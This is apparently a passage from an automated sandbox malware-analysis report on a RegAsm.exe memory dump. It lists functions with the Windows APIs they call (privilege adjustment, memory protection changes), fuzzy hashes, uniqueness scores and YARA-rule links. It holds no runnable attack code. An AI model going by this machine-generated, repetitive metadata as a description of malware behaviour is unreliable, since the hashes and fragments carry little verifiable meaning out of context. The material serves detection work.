Function 1FD2B1E6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1FD2B22F

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: de95f2cbe0cd533a4a70971f4c409abde5bfd4fc92b629a7cc55f17368cf4411
Instruction ID: 6c25dd2d1c61c024315af8c8c95f808711e3b1d38a52cbf8107a0f7ba4434403
Opcode Fuzzy Hash: de95f2cbe0cd533a4a70971f4c409abde5bfd4fc92b629a7cc55f17368cf4411
Instruction Fuzzy Hash: 5211A0355003449FDB10CF65D884B66FBE4EF04320F08C5AADD858B622D3B1E444CBA1

Uniqueness

Uniqueness Score: 0.25%

Function 1FD2B362, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1FD2B39D

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: d476a265b1093e37b8950b4dd45d11b6c1448aa8f8c5435d151db810ca4719f5
Instruction ID: 42a9bdf126e5dacc43a9afec704e2af640d33252c05bc5f2d8d4a7466b008c9c
Opcode Fuzzy Hash: d476a265b1093e37b8950b4dd45d11b6c1448aa8f8c5435d151db810ca4719f5
Instruction Fuzzy Hash: 4401DF35504340CFDB209F55DC84B25FBE0EF44320F08C69ADD840B211D3B1A008CBB2

Uniqueness

Uniqueness Score: 0.01%

Function 0112A8CD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,0112A011,00000040,01120692,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0112A8E6

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: 0.03%

Function 222FE06A, Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 222FE221

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 239025c0f3f47cc0c655314cb0b3c7e717c0e1645195089b82680d58657a1fa3
Instruction ID: b651654c59bf4c177e797e09a8cd8c5d31da1d8d91fca8d4a6be84fef69756a0
Opcode Fuzzy Hash: 239025c0f3f47cc0c655314cb0b3c7e717c0e1645195089b82680d58657a1fa3
Instruction Fuzzy Hash: 6D51A232F102199BDB05CFA9D940A9EFBB7FBD8300F118529E904BB394CE75AD118B90

Uniqueness

Uniqueness Score: 0.02%

Function 222FE070, Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 222FE221

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9368aa85191322cce95bfea04a66616a39354aa8e3f50e40c3d6a2430103cc4c
Instruction ID: c487a910c200ce2b1a0590b85a06358734c4631b5d5a2944f29b766189bea8dc
Opcode Fuzzy Hash: 9368aa85191322cce95bfea04a66616a39354aa8e3f50e40c3d6a2430103cc4c
Instruction Fuzzy Hash: B7519232E142199BDB05CFB9D950A9EFBB7EBC8300F11851AE904BB394CE75AD018B91

Uniqueness

Uniqueness Score: 0.02%

Function 22DE09E8, Relevance: 1.4, Strings: 1, Instructions: 131UNIQUE

Download Yara Rule

Strings

Ae\J, xrefs: 22DE0A6D

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: Ae\J
API String ID: 0-3438760793
Opcode ID: 76d228747fb3c51f05231e746f1c84d631e154bde37639964f9331f6b5da51c5
Instruction ID: af579c1751749077db455dbb6ca769555db8679cabbd66612c8063342b16f6ef
Opcode Fuzzy Hash: 76d228747fb3c51f05231e746f1c84d631e154bde37639964f9331f6b5da51c5
Instruction Fuzzy Hash: 93412931F183088BDB54DB78C96175EB6EBEB88700F50492ED94AEB390DE359D01C791

Uniqueness

Uniqueness Score: 100.00%

Function 22DE09D8, Relevance: 1.4, Strings: 1, Instructions: 124UNIQUE

Download Yara Rule

Strings

Ae\J, xrefs: 22DE0A6D

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID: Ae\J
API String ID: 0-3438760793
Opcode ID: fa7ce65e897a4bdfb534e87c02d29a9c64b85d79f5be5835db4d55030af9864b
Instruction ID: 7f8a704e10b77a7439540d6fee8a482421da91888402f66f7ae964bb9144036a
Opcode Fuzzy Hash: fa7ce65e897a4bdfb534e87c02d29a9c64b85d79f5be5835db4d55030af9864b
Instruction Fuzzy Hash: 78412632F183098BC754CA78C961B5EB6FBEB88701F90452EE94AFB390DA759D01C791

Uniqueness

Uniqueness Score: 100.00%

Function 0112290C, Relevance: 1.4, APIs: 1, Instructions: 106sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d192410096aa546de648cf986b48483541207c88b1e5ffe44ebd2c6d684f8cb9
Instruction ID: b0d8d1d903becc954189cd295a501e597714a6908eca67f9fb57a37a10154f0d
Opcode Fuzzy Hash: d192410096aa546de648cf986b48483541207c88b1e5ffe44ebd2c6d684f8cb9
Instruction Fuzzy Hash: E63185A190D7F0CEDF3F97288498B697AA09BA3201F464199D5470F886D7B84460DB73

Uniqueness

Uniqueness Score: 0.00%

Function 0112296C, Relevance: 1.3, APIs: 1, Instructions: 97sleepthreadUNIQUE

Download Yara Rule

APIs

Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000B62B,00000000,00000000,00000000), ref: 01122B36
TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: SleepTerminateThread
String ID:
API String ID: 480259992-0
Opcode ID: 44e9a9daf50b3881ca7975a6656dc16f874b5dff6a919cd5356c977d21d114db
Instruction ID: 05e3aa60e8a97070ef91be2d6deb019cca642977c776a969479cf67f1fc8d31d
Opcode Fuzzy Hash: 44e9a9daf50b3881ca7975a6656dc16f874b5dff6a919cd5356c977d21d114db
Instruction Fuzzy Hash: 253161A190D7F0CDDF3FA7288898B6A3AA09BB3201F564195D5470FC96D7A84460DB73

Uniqueness

Uniqueness Score: 100.00%

Function 22DE3850, Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 250343f3f126a219f75c5481b8b2274edf86d9972e582945963fac1e2bb20866
Instruction ID: 81d2c8fa0b189be74ae0b1323388b6014a770c72cf2e9d47c1aef593e5104168
Opcode Fuzzy Hash: 250343f3f126a219f75c5481b8b2274edf86d9972e582945963fac1e2bb20866
Instruction Fuzzy Hash: 6AF18030F103189BDB54DBB8C950B6DB3A6AF84710F158669E91AAF3A4DB31ED01CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22DE3840, Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 120e643ed7fa66e4ccd1159af8c30cad37bc0e79ef1517a94a5a5351a2c808b7
Instruction ID: 52a00daf2c117694b6401ac31f65571346e8e00738920ebca809aace1184b79a
Opcode Fuzzy Hash: 120e643ed7fa66e4ccd1159af8c30cad37bc0e79ef1517a94a5a5351a2c808b7
Instruction Fuzzy Hash: E1F18E30B103189BDB54DBB8C950B6EB7A6AF84710F158669E51AAF3A4DB31ED01CB90

Uniqueness

Uniqueness Score: 0.00%

Function 22DE44E9, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f31d5ce7ec5850acf6a452596ff7ab0b3b33b3ef81353562134c2774d6414ce
Instruction ID: 71d9563908a44c8d9386f651062481c86e3954440c63939e07a303e7264dddd9
Opcode Fuzzy Hash: 1f31d5ce7ec5850acf6a452596ff7ab0b3b33b3ef81353562134c2774d6414ce
Instruction Fuzzy Hash: B7E15F30F003588FEB69DB78C95079E77E2AF88304F1085ADD50AEB395DA35AD42CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22DE44F8, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f381a8745ead365e209961c56ccc518e8ff3eb0c8ef5bf52ded40210c570a8
Instruction ID: ef1a60579e3701640e68a23197f021cf905931cdffd885291687954450eeca6a
Opcode Fuzzy Hash: a4f381a8745ead365e209961c56ccc518e8ff3eb0c8ef5bf52ded40210c570a8
Instruction Fuzzy Hash: E6D15C30F003588FEB69DB78C95076E76E6AF88344F1085ADD50AEB394DE35AD42CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22CF7490, Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e821826aa78c470c27687da55d1c98b220f08e7aafcc1c3fa79a97394aa753c
Instruction ID: 3847cac0e911cc2c13be228ddf2181bfb07bbc048c6675af45af2c755e367101
Opcode Fuzzy Hash: 6e821826aa78c470c27687da55d1c98b220f08e7aafcc1c3fa79a97394aa753c
Instruction Fuzzy Hash: DEC13134B103098FDB98DF68C99099EB7F3AF88314F15892AD409EB354DA35ED46CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22CF4990, Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232587b6e27568a7881d5d33a5e36a30b344058ca76f05a16b0385d626ebbf44
Instruction ID: 2ae936bb3a57e22a1636a398ed0d14dc394c752c7c01de227fbe73a74dc49fa4
Opcode Fuzzy Hash: 232587b6e27568a7881d5d33a5e36a30b344058ca76f05a16b0385d626ebbf44
Instruction Fuzzy Hash: FBC18D35B002098FDB54CF69DA84A9DF7F2BF88304F148626EA05EB3A5DB349E41CB51

Uniqueness

Uniqueness Score: 0.00%

Function 22CFE788, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f14aff061f4487fac82de2297a0ab2654713a077bd1999dce115daa4cd9c5173
Instruction ID: cc931e5b0fcb0d77e3b3e190abb16ba307386b02a7b96153ca834e0c97dfdce0
Opcode Fuzzy Hash: f14aff061f4487fac82de2297a0ab2654713a077bd1999dce115daa4cd9c5173
Instruction Fuzzy Hash: F791B174B002148FDB44DF79C598A9DB7E2FF88704B14857AE90ADB364DB31AE01CB92

Uniqueness

Uniqueness Score: 0.00%

Function 22DE0640, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d66c4ca38f4a055815577596e8ad8443ff3ca720c0e8e692e5e42d5e49c23c
Instruction ID: 1967f9c03f35594f6a375e91035b7569ce65673f6c5dd937be198d959ead238a
Opcode Fuzzy Hash: e8d66c4ca38f4a055815577596e8ad8443ff3ca720c0e8e692e5e42d5e49c23c
Instruction Fuzzy Hash: B381C334B103088BDB44DBB8C89169EB7E7ABC8701B548A2AD90AFB354DE75DD41CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22DE0633, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88902d502cbf9026e2bbd045c7b98c4ecf0430b91df1212c922616d0a9e2adcf
Instruction ID: d9f13742bb208fa3d3c4346f6408929e06ab8c270a39630dd1bab747a1c41ad1
Opcode Fuzzy Hash: 88902d502cbf9026e2bbd045c7b98c4ecf0430b91df1212c922616d0a9e2adcf
Instruction Fuzzy Hash: 9D81B134B143088BD744DBB8C88169EB7F3ABC8701B548A2ED90AFB354DA75DD41CB91

Uniqueness

Uniqueness Score: 0.00%

Function 22CF59C6, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103c22147871a46018d20432ce8f52e952c241ee80d740d41c27acc34b45881f
Instruction ID: 1ba08c5065d943b4c8b793a28c3a01c73b11de4d7ed09db9179efc7f1ecfa227
Opcode Fuzzy Hash: 103c22147871a46018d20432ce8f52e952c241ee80d740d41c27acc34b45881f
Instruction Fuzzy Hash: DE71C931B003098FC758DB78C95466EB7A7EFC8350B14C92ADA1AE73A4DE35AD01CB55

Uniqueness

Uniqueness Score: 0.00%

Function 22CF59D0, Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9744db9f0a34c97c24923e6572031395814551cf8f598b9a98fb6af7e7f2dc97
Instruction ID: 081b05448644c8c8f3db88a63748aa37a4abe905afb0ec5801114af9c5caff99
Opcode Fuzzy Hash: 9744db9f0a34c97c24923e6572031395814551cf8f598b9a98fb6af7e7f2dc97
Instruction Fuzzy Hash: BA71C931B103098FC758DB78C95466EB7A7EFC8340B14C93ADA1AD73A4DE35AD018B55

Uniqueness

Uniqueness Score: 0.00%

Function 22CF50D7, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56c7125b58a0fe30387f1a1591cacb618f873a0aabc03ad011f2dc59781cf96
Instruction ID: f320b1e95f5fe1d1a66b9aa4dc614ae41fb3ade14d064ed596fe12b0f19dfa87
Opcode Fuzzy Hash: d56c7125b58a0fe30387f1a1591cacb618f873a0aabc03ad011f2dc59781cf96
Instruction Fuzzy Hash: 9E719031B043058FD7A4CA68D99166EF7F2FF84350B119A2BD61ADB798DB35ED018B80

Uniqueness

Uniqueness Score: 0.00%

Function 222FEFD9, Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b92abc986e4a0f3c4d2255118a5bf8796e13830941bd4aa4f39112cd4d8849c
Instruction ID: 2dbe69533625caf589945aa6cc42a783129186941cf2da966e78448d60ce5c28
Opcode Fuzzy Hash: 4b92abc986e4a0f3c4d2255118a5bf8796e13830941bd4aa4f39112cd4d8849c
Instruction Fuzzy Hash: 0471E530B142048BC7489B7CD65016EBAA7AFC0745F54852DD5069F7AACF3BCD4AC781

Uniqueness

Uniqueness Score: 0.00%

Function 222FF6D1, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f255476ba6febfb77ea9b426a7e16ebb2d140918ccfe633c9d459e99bbbff21a
Instruction ID: adf9972d99e0b64bc97274e8d37045f4495870d6ffd75c54378a74adf0cf8d32
Opcode Fuzzy Hash: f255476ba6febfb77ea9b426a7e16ebb2d140918ccfe633c9d459e99bbbff21a
Instruction Fuzzy Hash: A3510731B143149BDB44CB798C54B9EB2A7ABC8710F14C92AE906EB3D8DE36DD01D791

Uniqueness

Uniqueness Score: 0.00%

Function 22DE5601, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16918382151.0000000022DE0000.00000040.00000001.sdmp, Offset: 22DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22de0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b05477b8a443962b8eae2e68cad427a70f4bd9271aa06f3e74ae5f2aec61f96
Instruction ID: 8c1b140985829b3fd4a97a5f3a260bea88d1aff542f5894e2479fe77363db2f8
Opcode Fuzzy Hash: 8b05477b8a443962b8eae2e68cad427a70f4bd9271aa06f3e74ae5f2aec61f96
Instruction Fuzzy Hash: EB51E271F20218CBCB14EFB8CA5169EB7ABAB84294F10493ED50A9B354DF318D55CB82

Uniqueness

Uniqueness Score: 0.00%

Function 22CFEFC0, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f66843b2d6faeab748b8834627929f810a61ece99420187acf4cfd8312cd9a
Instruction ID: 4da294b009a8345bd0ef48580fe53ed9d67bf7c07fe0999d8248bb42eafcd091
Opcode Fuzzy Hash: 89f66843b2d6faeab748b8834627929f810a61ece99420187acf4cfd8312cd9a
Instruction Fuzzy Hash: EB51A131F103089BCB54DBB8D95069EB7A7EFC8340B10852AD90AE73A4DF35AD01DB95

Uniqueness

Uniqueness Score: 0.00%

Function 222FF6E0, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100896ec47402938e6dea351befb29c14232fbb15604288850833c170d70ed8a
Instruction ID: 50c9ecf9befe52c9968fdb1c2c174af1245a7db40f1e2f1ca163fde9d0f6b4ff
Opcode Fuzzy Hash: 100896ec47402938e6dea351befb29c14232fbb15604288850833c170d70ed8a
Instruction Fuzzy Hash: 4841E670B103189BD748CAB98C54B6FB6A7ABC8700F14C929D506EB3D8DE36DD008791

Uniqueness

Uniqueness Score: 0.00%

Function 222FF41A, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.16914634902.00000000222F0000.00000040.00000001.sdmp, Offset: 222F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_222f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeecb0cadf13a88407ad61452e1fe4250baf2f71e04dd1a59799f4e547b926d8
Instruction ID: 8c163c99e3f2c1b246cf119270ec93861adfde170e94912d87e7a9a80d94f593
Opcode Fuzzy Hash: aeecb0cadf13a88407ad61452e1fe4250baf2f71e04dd1a59799f4e547b926d8
Instruction Fuzzy Hash: B8310732B203158BC714DF78995449EF7B6AB88700B45893ADA19EB3A9DE32D904C781

Uniqueness

Uniqueness Score: 0.00%

Function 22CF1E70, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 381libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 2638914809-3129563594
Opcode ID: 1b66764fb7a4c30fe665d6ba765a1a36d7ced225eed97becea7c355c25f34bd8
Instruction ID: 5b676be34737e1fb2b7d4d930e65252d4623d2414e46406e6c8a4a8476f2db5f
Opcode Fuzzy Hash: 1b66764fb7a4c30fe665d6ba765a1a36d7ced225eed97becea7c355c25f34bd8
Instruction Fuzzy Hash: B40218B4E006198FCB64DF64CD90B9EB7B2EF88310F1086E9C909A7394DA355E91CF55

Uniqueness

Uniqueness Score: 100.00%

Function 22CF1EC4, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 371libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 2638914809-3129563594
Opcode ID: d7edfdf067147e766a9f22973a1b0be94aa7cbcad7f05e5c1345830803bdd418
Instruction ID: b96f4c2edb9f6940873f0103e77bfe0f031d10c42f37fe70a8372f40413420a5
Opcode Fuzzy Hash: d7edfdf067147e766a9f22973a1b0be94aa7cbcad7f05e5c1345830803bdd418
Instruction Fuzzy Hash: 12F108B4A006198FCB64DF64CD90B9EB7B2EF88310F1086E9C909A7394DA355E91CF55

Uniqueness

Uniqueness Score: 100.00%

Function 22CF1F18, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 361libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 2638914809-3129563594
Opcode ID: f46045d9950ab7497874fcfb63eab8c69aebd1d6340f264104cf31e545a5c4b2
Instruction ID: e2eb572756ea79eab6c965372192c7c31b5e3b4a6c756eb4d7fa0580b54eaad8
Opcode Fuzzy Hash: f46045d9950ab7497874fcfb63eab8c69aebd1d6340f264104cf31e545a5c4b2
Instruction Fuzzy Hash: 83F119B4A006198FCB68DF64CD90B9EB7B2EF88300F1086E9C509E7394DA356E91CF55

Uniqueness

Uniqueness Score: 100.00%

Function 22CF1F6C, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 351libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
KiUserExceptionDispatcher.NTDLL ref: 22CF2086
LdrInitializeThunk.NTDLL ref: 22CF23CC

Strings

5, xrefs: 22CF208F
@?, xrefs: 22CF2454
@B, xrefs: 22CF23C7
?, xrefs: 22CF2444
5, xrefs: 22CF20C3
`4, xrefs: 22CF20F7
@5, xrefs: 22CF209F
B, xrefs: 22CF2162
?, xrefs: 22CF24A1
B, xrefs: 22CF23A3

Memory Dump Source

Source File: 0000000A.00000002.16917198685.0000000022CF0000.00000040.00000001.sdmp, Offset: 22CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22cf0000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser$InitializeThunk
String ID: 5$ ?$ B$@5$@?$@B$`4$5$?$B
API String ID: 2638914809-3129563594
Opcode ID: a26f10d86f41e98c9220275e06f8251488f4b7f0836985bf07564ecc34d49d21
Instruction ID: c3490bcb91788b8a467de07508dd795c4f152ded0138556c40647481ed0cb7a6
Opcode Fuzzy Hash: a26f10d86f41e98c9220275e06f8251488f4b7f0836985bf07564ecc34d49d21
Instruction Fuzzy Hash: DDF10AB4A006198FCB68DF65CD90B9EB7B2EF88300F1086E9C509E7394DA356E91CF55

Uniqueness

Uniqueness Score: 100.00%

Function 22CF1FC0, Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 341libraryUNIQUE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 22CF1FE4
